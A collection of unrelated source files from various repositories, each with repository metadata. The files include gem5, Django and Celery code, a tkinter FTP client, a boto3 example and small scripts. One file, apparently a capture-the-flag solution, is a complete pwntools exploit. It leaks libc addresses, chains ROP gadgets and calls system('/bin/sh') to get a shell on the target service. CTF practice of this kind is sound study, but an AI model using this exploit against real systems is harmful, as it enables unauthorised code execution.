CxxOmniCpp_Create = libCxxParser.CxxOmniCpp_Create
CxxOmniCpp_Create.restype = c_void_p
CxxOmniCpp_Create.argtypes = [c_void_p, c_char_p]
CxxOmniCpp_Destroy = libCxxParser.CxxOmniCpp_Destroy
CxxOmniCpp_Destroy.argtypes = [c_void_p]
CxxOmniCpp_GetSearchScopes = libCxxParser.CxxOmniCpp_GetSearchScopes
CxxOmniCpp_GetSearchScopes.restype = c_char_p
CxxOmniCpp_GetSearchScopes.argtypes = [c_void_p]
GetScopeStack = libCxxParser.GetScopeStack
GetScopeStack.restype = POINTER(c_char)
GetScopeStack.argtypes = [c_char_p]
CxxParser_GetVersion = libCxxParser.CxxParser_GetVersion
CxxParser_GetVersion.restype = c_int
CxxParser_GetVersion.argtypes = []
#pParser = CxxHWParser_Create("test");
#print pParser
#pResult = CxxOmniCpp_Create(pParser, "hello");
#print pResult
#print CxxOmniCpp_GetSearchScopes(pResult)
#CxxOmniCpp_Destroy(pResult);
#pResult = None
#CxxHWParser_Destroy(pParser)
#pParser = None
if __name__ == "__main__":
import sys
print 'CxxParser version: %d' % CxxParser_GetVersion()
if not sys.argv[1:]:
print "usage: %s {file} [line]" % sys.argv[0]
sys.exit(1)
line = 1000000
if sys.argv[1:]:
fn = sys.argv[1]
if sys.argv[2:]:
line = int(sys.argv[2])
f = open(fn)
allLines = f.readlines()
f.close()
lines = ''.join(allLines[: line])
#print lines
print GetCharPStr(GetScopeStack(lines))
|
[
"scraper@vim-scripts.org"
] |
scraper@vim-scripts.org
|
e163229f5e46d720fdae4023213da540e1db2015
|
d63b1b36634b68070f6f3c017c0250a7ea646e6f
|
/SMC/GEM5/gem5/configs/ruby/Ruby.py
|
3c43fa6c6ab7b2583830352c954a5cc2bd02d152
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later"
] |
permissive
|
jiwon-choe/Brown-SMCSim
|
ccf506d34d85fb3d085bf50ed47de8b4eeaee474
|
ff3d9334c1d5c8d6a00421848c0d51e50e6b67f8
|
refs/heads/master
| 2021-06-30T00:15:57.128209
| 2020-11-24T03:11:41
| 2020-11-24T03:11:41
| 192,596,189
| 15
| 8
|
MIT
| 2019-06-20T15:43:00
| 2019-06-18T18:53:40
|
C++
|
UTF-8
|
Python
| false
| false
| 8,951
|
py
|
# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from m5.util import addToPath, fatal
addToPath('../topologies')
def define_options(parser):
# By default, ruby uses the simple timing cpu
parser.set_defaults(cpu_type="timing")
parser.add_option("--ruby-clock", action="store", type="string",
default='2GHz',
help="Clock for blocks running at Ruby system's speed")
# Options related to cache structure
parser.add_option("--ports", action="store", type="int", default=4,
help="used of transitions per cycle which is a proxy \
for the number of ports.")
# ruby network options
parser.add_option("--topology", type="string", default="Crossbar",
help="check src/mem/ruby/network/topologies for complete set")
parser.add_option("--mesh-rows", type="int", default=1,
help="the number of rows in the mesh topology")
parser.add_option("--garnet-network", type="choice",
choices=['fixed', 'flexible'], help="'fixed'|'flexible'")
parser.add_option("--network-fault-model", action="store_true", default=False,
help="enable network fault model: see src/mem/ruby/network/fault_model/")
# ruby mapping options
parser.add_option("--numa-high-bit", type="int", default=0,
help="high order address bit to use for numa mapping. " \
"0 = highest bit, not specified = lowest bit")
# ruby sparse memory options
parser.add_option("--use-map", action="store_true", default=False)
parser.add_option("--map-levels", type="int", default=4)
parser.add_option("--recycle-latency", type="int", default=10,
help="Recycle latency for ruby controller input buffers")
parser.add_option("--random_seed", type="int", default=1234,
help="Used for seeding the random number generator")
parser.add_option("--ruby_stats", type="string", default="ruby.stats")
protocol = buildEnv['PROTOCOL']
exec "import %s" % protocol
eval("%s.define_options(parser)" % protocol)
def create_topology(controllers, options):
""" Called from create_system in configs/ruby/<protocol>.py
Must return an object which is a subclass of BaseTopology
found in configs/topologies/BaseTopology.py
This is a wrapper for the legacy topologies.
"""
exec "import %s as Topo" % options.topology
topology = eval("Topo.%s(controllers)" % options.topology)
return topology
def create_system(options, system, piobus = None, dma_ports = []):
system.ruby = RubySystem(no_mem_vec = options.use_map)
ruby = system.ruby
# Set the network classes based on the command line options
if options.garnet_network == "fixed":
NetworkClass = GarnetNetwork_d
IntLinkClass = GarnetIntLink_d
ExtLinkClass = GarnetExtLink_d
RouterClass = GarnetRouter_d
InterfaceClass = GarnetNetworkInterface_d
elif options.garnet_network == "flexible":
NetworkClass = GarnetNetwork
IntLinkClass = GarnetIntLink
ExtLinkClass = GarnetExtLink
RouterClass = GarnetRouter
InterfaceClass = GarnetNetworkInterface
else:
NetworkClass = SimpleNetwork
IntLinkClass = SimpleIntLink
ExtLinkClass = SimpleExtLink
RouterClass = Switch
InterfaceClass = None
# Instantiate the network object so that the controllers can connect to it.
network = NetworkClass(ruby_system = ruby, topology = options.topology,
routers = [], ext_links = [], int_links = [], netifs = [])
ruby.network = network
protocol = buildEnv['PROTOCOL']
exec "import %s" % protocol
try:
(cpu_sequencers, dir_cntrls, topology) = \
eval("%s.create_system(options, system, dma_ports, ruby)"
% protocol)
except:
print "Error: could not create sytem for ruby protocol %s" % protocol
raise
# Create a port proxy for connecting the system port. This is
# independent of the protocol and kept in the protocol-agnostic
# part (i.e. here).
sys_port_proxy = RubyPortProxy(ruby_system = ruby)
# Give the system port proxy a SimObject parent without creating a
# full-fledged controller
system.sys_port_proxy = sys_port_proxy
# Connect the system port for loading of binaries etc
system.system_port = system.sys_port_proxy.slave
# Create the network topology
topology.makeTopology(options, network, IntLinkClass, ExtLinkClass,
RouterClass)
if InterfaceClass != None:
netifs = [InterfaceClass(id=i) for (i,n) in enumerate(network.ext_links)]
network.netifs = netifs
if options.network_fault_model:
assert(options.garnet_network == "fixed")
network.enable_fault_model = True
network.fault_model = FaultModel()
# Loop through the directory controlers.
# Determine the total memory size of the ruby system and verify it is equal
# to physmem. However, if Ruby memory is using sparse memory in SE
# mode, then the system should not back-up the memory state with
# the Memory Vector and thus the memory size bytes should stay at 0.
# Also set the numa bits to the appropriate values.
total_mem_size = MemorySize('0B')
ruby.block_size_bytes = options.cacheline_size
block_size_bits = int(math.log(options.cacheline_size, 2))
if options.numa_high_bit:
numa_bit = options.numa_high_bit
else:
# if the numa_bit is not specified, set the directory bits as the
# lowest bits above the block offset bits, and the numa_bit as the
# highest of those directory bits
dir_bits = int(math.log(options.num_dirs, 2))
numa_bit = block_size_bits + dir_bits - 1
for dir_cntrl in dir_cntrls:
total_mem_size.value += dir_cntrl.directory.size.value
dir_cntrl.directory.numa_high_bit = numa_bit
phys_mem_size = sum(map(lambda r: r.size(), system.mem_ranges))
assert(total_mem_size.value == phys_mem_size)
ruby.mem_size = total_mem_size
# Connect the cpu sequencers and the piobus
if piobus != None:
for cpu_seq in cpu_sequencers:
cpu_seq.pio_master_port = piobus.slave
cpu_seq.mem_master_port = piobus.slave
if buildEnv['TARGET_ISA'] == "x86":
cpu_seq.pio_slave_port = piobus.master
ruby._cpu_ports = cpu_sequencers
ruby.num_of_sequencers = len(cpu_sequencers)
ruby.random_seed = options.random_seed
|
[
"brandnew7th@gmail.com"
] |
brandnew7th@gmail.com
|
4cab7f02d839b5bf99ada9539b6cce74b4359343
|
9f0e740c6486bcb12f038c443b039c886124e55c
|
/python-study/library/celery/period/app.py
|
5d1923b6a0c639b8355f935d8cc951c569b7d363
|
[] |
no_license
|
zfanai/python-study
|
373ff09bd1e6be9e098bde924c98f5277ad58a54
|
de11a6c8018730bb27e26808f5cbc0c615b4468f
|
refs/heads/master
| 2021-01-18T17:59:16.817832
| 2017-11-06T09:33:21
| 2017-11-06T09:33:21
| 86,831,175
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 137
|
py
|
#encoding:gbk
from celery import Celery
import config
app=Celery()
app.config_from_object(config)
print app.conf.CELERY_TIMEZONE
|
[
"zf_sch@126.com"
] |
zf_sch@126.com
|
1984f8f05213e4c460c85d2ac2ddcae735c9c2c8
|
8e36265de7d95d4fd7bc8ccec9a25ebb07b4e435
|
/pola/ai_pics/migrations/0009_auto_20210117_0154.py
|
402016adab9dc66a88a8b7f885e4dddea1f9990a
|
[
"BSD-3-Clause"
] |
permissive
|
KlubJagiellonski/pola-backend
|
edd4b7c4115f008390a665554d973924f69f47af
|
e16eab52bf2e5ddacea1d69c3ac165cd761a2171
|
refs/heads/master
| 2023-09-01T21:14:06.625762
| 2023-09-01T04:42:15
| 2023-09-01T04:42:15
| 40,557,946
| 33
| 15
|
BSD-3-Clause
| 2023-09-14T08:45:36
| 2015-08-11T18:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 700
|
py
|
# Generated by Django 3.1.5 on 2021-01-17 00:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ai_pics', '0008_auto_20210117_0109'),
]
operations = [
migrations.AlterField(
model_name='aipics',
name='flash_used',
field=models.BooleanField(null=True),
),
migrations.AlterField(
model_name='aipics',
name='is_valid',
field=models.BooleanField(null=True),
),
migrations.AlterField(
model_name='aipics',
name='was_portrait',
field=models.BooleanField(null=True),
),
]
|
[
"noreply@github.com"
] |
KlubJagiellonski.noreply@github.com
|
3eb241c050e2b325524ee5f76f4ba74669099d55
|
0884dfe08f536f1883f20ed102001fdfa0ac7b4e
|
/example/leak_lib/pwn100.py
|
a5298933e439e0c2ff2821e972b699c19c1744fb
|
[] |
no_license
|
xiaoyj/ShawPwn
|
4b40329be2735ea18e42a8006ba906c5903851f0
|
cfa408f22094f0a03607d1f56043d641735d9cb3
|
refs/heads/master
| 2021-04-04T20:34:38.675318
| 2020-03-19T11:48:16
| 2020-03-19T11:48:16
| 248,485,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
#!/usr/bin/python
#coding:utf-8
#64位 puts函数泄露lib地址,使用万能gadget
from pwn import *
context.update(arch = 'amd64', os = 'linux', timeout = 1)
io = remote('172.17.0.3', 10001)
def write(data):
for i in data:
io.send(i)
elf=ELF("./pwn100")
read_got=elf.got['read']
puts_plt=elf.plt['puts']
pop_rdi=0x0000000000400763
start=0x0000000000400550
start_addr = 0x400550
pop_rdi = 0x400763
pop6_addr = 0x40075a #万能gadget1:pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; retn
mov_call_addr = 0x400740 #万能gadget2:mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12+rbx*8]
binsh_addr = 0x60107c #bss放了STDIN和STDOUT的FILE结构体,修改会导致程序崩溃,所以找了个固定的可写地址
def leak(addr):
count = 0
up = ''
content = ''
payload="A"*0x48
payload+=p64(pop_rdi)
payload+=p64(addr)
payload+=p64(puts_plt)
payload+=p64(start)
payload=payload.ljust(200,'B')
write(payload)
io.recvline()
while True: #无限循环读取,防止recv()读取输出不全
c = io.recv(numb=1, timeout=0.1) #每次读取一个字节,设置超时时间确保没有遗漏
count += 1
if up == '\n' and c == "": #上一个字符是回车且读不到其他字符,说明读完了
content = content[:-1]+'\x00' #最后一个字符置为\x00
break
else:
content += c #拼接输出
up = c #保存最后一个字符
content = content[:4] #截取输出的一段作为返回值,提供给DynELF处理
log.info("%#x => %s" % (addr, (content or '').encode('hex')))
return content
d = DynELF(leak, elf = elf)
system_addr = d.lookup('system', 'libc')
read_addr = d.lookup('read', 'libc')
log.info("system_addr = %#x", system_addr)
log.info("read_addr = %#x", read_addr)
payload = "A"*72 #padding
payload += p64(pop6_addr) #万能gadget1
payload += p64(0) #rbx = 0
payload += p64(1) #rbp = 1,过掉后面万能gadget2的call返回后的判断
payload += p64(read_got) #r12 = got表中read函数项,里面是read函数的真正地址,直接通过万能gadget2的call qword ptr [r12+rbx*8]调用
payload += p64(8) #r13 = 8,read函数读取的字节数,万能gadget2赋值给rdx
payload += p64(binsh_addr) #r14 = read函数读取/bin/sh保存的地址,万能gadget2赋值给rsi
payload += p64(0) #r15 = 0,read函数的参数fd,即STDIN,万能gadget2赋值给edi
payload += p64(mov_call_addr) #万能gadget2
payload += '\x00'*56 #万能gadget2后接判断语句,过掉之后是万能gadget1,用于填充栈
payload += p64(start_addr) #跳转到start,恢复栈
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.recvuntil('bye~\n')
io.send("/bin/sh\x00") #上面的一段payload调用了read函数读取"/bin/sh\x00",这里发送字符串
payload = "A"*72 #padding
payload += p64(pop_rdi) #给system函数传参
payload += p64(binsh_addr) #rdi = &("/bin/sh\x00")
payload += p64(system_addr) #调用system函数执行system("/bin/sh")
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.interactive()
|
[
"xiaoyijie2007@126.com"
] |
xiaoyijie2007@126.com
|
86dc84d7f0e363f3d1b4cdfe3ac94760b4a104b2
|
b26802c1fc0ac33cabf6d2ab538c98f45b9b291f
|
/colossus/apps/notifications/__init__.py
|
84da84df286aa3bfa5c86e37b3d96df551845a2c
|
[
"MIT"
] |
permissive
|
Beracah-Group/colossus
|
4ba81092dc5c9c694b22eb4101f63e7747961fcf
|
7bce25039a223da7197cc8a969ec72ee26aeffa8
|
refs/heads/master
| 2020-03-26T08:58:45.572073
| 2018-08-14T13:35:53
| 2018-08-14T13:35:53
| 144,728,897
| 2
| 0
|
MIT
| 2018-08-14T14:06:50
| 2018-08-14T14:06:50
| null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
default_app_config = 'colossus.apps.notifications.apps.NotificationsConfig'
|
[
"vitorfs@gmail.com"
] |
vitorfs@gmail.com
|
df5bd7dced3de122cbe784bd31d4b447ba40bdc3
|
039f2c747a9524daa1e45501ada5fb19bd5dd28f
|
/ABC111/ABC111b.py
|
d0841383fb4172230f365cbdcec870be2139ac92
|
[
"Unlicense"
] |
permissive
|
yuto-moriizumi/AtCoder
|
86dbb4f98fea627c68b5391bf0cc25bcce556b88
|
21acb489f1594bbb1cdc64fbf8421d876b5b476d
|
refs/heads/master
| 2023-03-25T08:10:31.738457
| 2021-03-23T08:48:01
| 2021-03-23T08:48:01
| 242,283,632
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 197
|
py
|
# ABC111b
import sys
input = sys.stdin.readline
sys.setrecursionlimit(10**6)
n = int(input())
ans = 111
for i in range(1, 10):
if (n <= 111 * i):
ans = 111*i
break
print(ans)
|
[
"kurvan1112@gmail.com"
] |
kurvan1112@gmail.com
|
eacd80b9251895bf54c2441bc92a6037be61fdee
|
a646afb4228fbc1b79e68b714e4db628dda33c93
|
/ftpProgram.py
|
4332bb5a9705e21c4347d22808cb4404f19526cd
|
[] |
no_license
|
kralmachine/ftpprogrammingwithpython
|
de220a022f11c3d5110530194254cdd90c299faa
|
f3fa3c48f2fe7d1d120fa947768e7a6de1d56fef
|
refs/heads/master
| 2021-04-12T12:36:05.306636
| 2018-03-21T13:42:16
| 2018-03-21T13:42:16
| 126,184,016
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,110
|
py
|
# ABDULLAH AVŞAR 141180501 21 MART 2018 ÇARŞAMBA
#BM402 BİLGİSAYAR AĞLARI ÖDEV - 3
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
import os
import ftplib
say=0
def girisYap():
global say
say=0
if(hostname.get()!='' and userName.get()!='' and passWord.get()!=''):
ftp=ftplib.FTP(hostname.get()) #Host ismi giriliyor örnek 192.168.0.23 veya ftp.python.org
ftp.login(userName.get(),passWord.get()) #host kullanıcı adı ve şifre giriliyor
print(ftp.getwelcome()) #host a girdikten sonra bir mesaj veriliyor
print('Current Directory',ftp.pwd()) #güncel dosya yolu gösteriliyor
ftp.dir() #güncel dosya ve klasör listelerini çekiyoruz
gelenServerDosyalar.insert(END,ftp.getwelcome()) #ftp giriş kısmını yazdırma işlemi yapma
gelenServerDosyalar.insert(END,'Current Directory'+ftp.pwd()) #güncel klasör yolunu belirtme
for direc in ftp.nlst(): #güncel dosyaları foreach döngüsü yaparak onları ekleme işlemi yapıyoruz
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'-----------------------------')
gelenServerDosyalar.pack(side=RIGHT)
say=1
else:
print('Lütfen Verileri Doldurun')
def dosyaSec():
directory=filedialog.askdirectory() #client için dosya açma işlemi
print (directory)
for roots,dirs,files in os.walk(directory): #dosya işleminden gelen dosyaları , klasörleri ekleme işlemi yapılır
for file in files:
print('File =%s' % file)
gelenClientDosyalar.insert(END,file)
for direc in dirs:
print('Direc =%s' % direc)
gelenClientDosyalar.insert(END,direc)
gelenClientDosyalar.insert(END,'-----------------------------')
gelenClientDosyalar.pack(side=LEFT)
def cikisYap():
mGUI.destroy() #form dan çıkış yapmak ram'den yok ediyoruz object i
mGUI.quit() #formu kapatma
def komutCalistir():
command=komutIslem.get() #gelen komut u command değişkenine atma
print(command)
commands=command.split() #command dan gelen değerleri parçalama işlemi yaparak onları kullanacağız
for i in commands:
print(i)
print(say,command)
if(say==1 and command!=''): #giriş işlemi yapıldımı kontrol ediyor.
ftp=ftplib.FTP(hostname.get())
ftp.login(userName.get(),passWord.get())
if commands[0]=='cd': #kalsör değiştirme işlemi yapar.
try:
ftp.cwd(commands[1])
print('Directory of ',ftp.pwd())
gelenServerDosyalar.insert(END,'Directory of '+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
print('Current Diretory',ftp.pwd())
gelenServerDosyalar.insert(END,'Directory of '+ftp.pwd())
gelenServerDosyalar.insert(END,'----------------------------------')
except ftplib.error_perm as e: #handle 550 (not found / no permission error)
error_code=str(e).split(None,1)
if error_code[0]=='550':
print(error_code[1],'Directory may not exits or you may not have permission to view it')
gelenServerDosyalar.insert(END,error_code[1]+'Directory may not exits or you may not have permission to view it')
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='get': #Dosya indirme işlemi yapar
try:
ftp.retrbinary('RETR '+commands[2], open(commands[1]+commands[2],'wb').write) #dosya yı yazdırma işlemi yapar ve istenilen yere indirme yapar
print('File successful download')
gelenServerDosyalar.insert(END,'File successful download')
gelenServerDosyalar.insert(END,'----------------------------------')
except ftplib.error_perm as e: #handle 550 (not found / no permission error)
error_code=str(e).split(None,1)
if error_code[0]=='550':
print(error_code[1],'File may not exits or you may not have permission to view it')
gelenServerDosyalar.insert(END,error_code[1]+' File may not exits or you may not have permission to view it')
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='fup': #dosya upload işlemi yapar
try:
ftp.storlines('STOR '+commands[2],open(commands[1]+commands[2],'rb')) #istenilen dosyayı istenilen yere upload işlemi sağlar
print('File successful upload')
gelenServerDosyalar.insert(END,'File successful upload')
gelenServerDosyalar.insert(END,'----------------------------------')
except ftplib.error_perm as e: #handle 550 (not found / no permission error)
error_code=str(e).split(None,1)
if error_code[0]=='550':
print(error_code[1],'File may not exits or you may not have permission to view it')
gelenServerDosyalar.insert(END,error_code[1]+'File may not exits or you may not have permission to view it')
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='ls': #Dosyaları yazdırma işlemi yapar
print('Directory of',ftp.pwd())
ftp.dir()
gelenServerDosyalar.insert(END,'Directory of',ftp.pwd())
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='mkd': #Dosya oluşturma işlemi yapar
ftp.mkd('/'+commands[1])
print('Successful create a directory')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful create a directory')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='rn': #Dosya adı değiştirme işlemi yapar
ftp.rename('/'+commands[1],'/'+commands[2])
print('Successful rename a directory')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful rename a directory')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='delete': #Dosya silme işlemi yapar
ftp.delete('/'+commands[1])
print('Successful remove a file')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful remove a file')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='rmd': # Klasör silme işlemi yapar
ftp.rmd('/'+commands[1])
print('Successful remove a directory')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful remove a directory')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
elif commands[0]=='exit': #ftp den çıkma işlemi yapar
ftp.quit()
print('İyi Günler FTP Kapatmıştır')
gelenServerDosyalar.insert(END,'İyi Günler FTP Kapatmıştır')
gelenServerDosyalar.insert(END,'----------------------------------')
else: #belirlediğimiz komutlar kullanılmıyorsa invalid hatası vermesi için else işlemi yapıyoruz.
print('Invalid command try again (vali options cd/get/ls/mkd/rn/delete/rmd/exit)')
gelenServerDosyalar.insert(END,'Invalid command try again (vali options cd/get/ls/mkd/rn/delete/rmd/exit)')
gelenServerDosyalar.insert(END,'---------------------------------------')
else: #eğer giriş işlemi yapılmadıysa hata mesajı çıkacak.
messagebox.showerror('Hata','Lütfen Host Girişi Yapınız\nveya\nKomut Satırını Boş Geçmeyiniz.')
mGUI=Tk() #tkinter yani GUI için nesne türetme
mGUI.title('FTP PROGRAM') #GUI için başlık ekleme
mGUI.geometry('1000x650+200+50') #GUI için boyut ayarlama
hostname=StringVar() #Entry component i için bir string değişken tanımlama
userName=StringVar() #Entry component i için bir string değişken tanımlama
passWord=StringVar() #Entry component i için bir string değişken tanımlama
komutIslem=StringVar() #Entry component i için bir string değişken tanımlama
#Kullanıcı şifre host tasarim
lblGirisYazi=Label(mGUI,text='FTP PROGRAMINA HOŞ GELDİNİZ\nLÜTFEN GİRİŞ İŞLEMLERİNİ YAPINIZ',fg='Red').pack()
hostName=Entry(mGUI,textvariable=hostname,width=20).pack() #hostname girişi
kulAd=Entry(mGUI,textvariable=userName,width=20).pack() #hostname kullanıcı adı girişi
kulSifre=Entry(mGUI,textvariable=passWord,width=20).pack() #hostname şifre girişi
btnGiris=Button(mGUI,text='Giriş Yapınız',command=girisYap,fg='Black').pack() #Giriş İşlemi
#Clien Server Tasarım
#Client
btnDosyaSec=Button(mGUI,text='ClientDosya Seç',fg='Black',command=dosyaSec).pack()
gelenClientDosyalar=Listbox(mGUI,width=60,height=30)
#Server
gelenServerDosyalar=Listbox(mGUI,width=60,height=30)
btnGiris=Button(mGUI,text='Çıkış Yapınız',command=cikisYap,fg='Black').pack()
#Komut Girişi ve Komut Çalıştırma
lblGirisYazi=Label(mGUI,text='FTP KOMUT ÇALIŞTIRMA EKRANI (cd,get,fup,ls,mkd,rn,delete,rmd,exit)',fg='Red').pack()
komutCalistirma=Entry(mGUI,textvariable=komutIslem,width=80).pack() #komut çalıştırma için bir entry tanımlanmıştır.
btnGiris=Button(mGUI,text='Komut Çalıştır',command=komutCalistir,fg='Black').pack()
lblBilgilendirme=Label(mGUI,fg='red',text='cd,get,fup,ls,mkd,rn,delete,rmd,exit komutları vardır.\nBunlar şöyledir\ncd komutu klasör erişi için örn (cd dosya)\nget download için örn (get C:\\Users\\aAa\\Desktop\\ deneme.txt)\nfup upload için örn (fup C:\\Users\\aAa\\Desktop\\ deneme.txt)\nls komutu listeleme yapar örn (ls)\nmkd komutu bir klasöt oluşturur örn (mkd deneme)\nrn komutu dosya ismi değiştirme yapar örn (rn deneme dene)\ndelete işlemi dosya siler örn (delete deneme.txt)\nrmd işlemi klasör siler örn (rmd deneme)\nexit işlemi ftp kapatır örn (exit)')
lblBilgilendirme.pack()
mGUI.mainloop() #GUI ekranda tutması için gereken kod
|
[
"noreply@github.com"
] |
kralmachine.noreply@github.com
|
0e0db48e77456ab1dc55c0ea161b52b3e33e2f02
|
17a3cf69421e3cef5196b8cc28bf2a342884d766
|
/Downloading_files_s3.py
|
d596b878725ccf6964b9dbe1e6f9e21730c547c7
|
[] |
no_license
|
POC-AWS-services/AWS-S3
|
976f230f4c9c1ba9d9efc67f95979eb388257784
|
4a08aa218155e1a5b99f0f3f9d49ae7251d4e6e7
|
refs/heads/master
| 2022-11-29T09:09:11.046099
| 2020-07-23T08:20:08
| 2020-07-23T08:20:08
| 281,882,276
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
__Author__ = 'Prameet Bisht'
__Version__ = "0.0.1"
__Email__ = "myprameet09@gmail.com"
__Github__ = "https://github.com/orgs/POC-AWS-services/dashboard"
#The download_file method accepts the names of the bucket and object to download and the filename to save the file to.
import boto3
s3 = boto3.client('s3')
s3.download_file('BUCKET_NAME', 'OBJECT_NAME', 'FILE_NAME')
#The download_fileobj method accepts a writeable file-like object. The file object must be opened in binary mode, not text mode.
s3 = boto3.client('s3')
with open('FILE_NAME', 'wb') as f:
s3.download_fileobj('BUCKET_NAME', 'OBJECT_NAME', f)
|
[
"myprameet09@gmail.com"
] |
myprameet09@gmail.com
|
0c17d754ebe3de15144d5ae5b742743bb74c6c9e
|
ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1
|
/res/packages/scripts/scripts/client/gui/shared/gui_items/dossier/achievements/GeniusForWarAchievement.py
|
7e725c76279abb1568946eee467f165f33da4db6
|
[] |
no_license
|
webiumsk/WOT-0.9.20.0
|
de3d7441c5d442f085c47a89fa58a83f1cd783f2
|
811cb4e1bca271372a1d837a268b6e0e915368bc
|
refs/heads/master
| 2021-01-20T22:11:45.505844
| 2017-08-29T20:11:38
| 2017-08-29T20:11:38
| 101,803,045
| 0
| 1
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 864
|
py
|
# 2017.08.29 21:49:43 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/GeniusForWarAchievement.py
from dossiers2.ui.achievements import ACHIEVEMENT_BLOCK as _AB
from abstract import SimpleProgressAchievement
class GeniusForWarAchievement(SimpleProgressAchievement):
def __init__(self, dossier, value = None):
super(GeniusForWarAchievement, self).__init__('geniusForWarMedal', _AB.TEAM_7X7, dossier, value)
def _readProgressValue(self, dossier):
return dossier.getRecordValue(_AB.TEAM_7X7, 'geniusForWar')
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\shared\gui_items\dossier\achievements\GeniusForWarAchievement.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:49:43 Střední Evropa (letní čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
4e061c6d7685eaed94cbffea578bff7fb6cf3c09
|
1c8f5e2dbd7ebf9c3b8c1c298004b25e3c883d2a
|
/peptask/__init__.py
|
b3d529aadd7f4ba94e3c9cd40710d79ac210ef9f
|
[] |
no_license
|
pepijnKrijnsen/peptask
|
53066b5f1e5c768eb595c04d5a9376e2d2ef357b
|
55d4f26a89ee7dda481997a948e9f0d3adbd4d74
|
refs/heads/main
| 2023-02-07T07:37:16.422577
| 2020-12-25T21:54:17
| 2020-12-25T21:54:17
| 323,416,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
import os
from flask import Flask
def create_app():
app = Flask(__name__, instance_relative_config = True)
try:
os.makedirs(app.instance_path)
except OSError:
pass
from . import view
app.register_blueprint(view.bp)
return app
|
[
"pepijn@krijnsen.com"
] |
pepijn@krijnsen.com
|
ce8cd7ab7bda889cde62b33efeec107a6221b56b
|
